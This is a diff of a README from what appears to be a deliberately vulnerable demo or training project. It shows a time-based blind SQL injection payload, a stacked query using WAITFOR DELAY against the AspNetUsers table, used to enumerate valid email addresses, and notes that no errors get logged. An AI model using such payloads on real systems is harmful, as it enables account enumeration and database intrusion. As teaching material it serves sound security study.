bathcat/mango-bay/sql-injection.README.md

 **Attack String (Check if admin@example.com exists):**

 ```
-' OR (SELECT CASE WHEN EXISTS(SELECT 1 FROM AspNetUsers WHERE Email = 'admin@example.com') THEN (SELECT COUNT(*) FROM sys.objects a, sys.objects b, sys.objects c) ELSE 1 END) > 0; --
+test', 0, 20; IF EXISTS(SELECT 1 FROM AspNetUsers WHERE Email='admin@example.com') WAITFOR DELAY '00:00:03'; --
 ```

 **How it works:**

-- If the email exists, the query performs an expensive Cartesian product, causing a noticeable delay (several seconds)
 - If the email doesn't exist, the query completes quickly
 - By measuring response time, an attacker can enumerate valid email addresses
+- Note: the stored procedure actually runs, so no errors get logged.

 **Simpler timing attack:**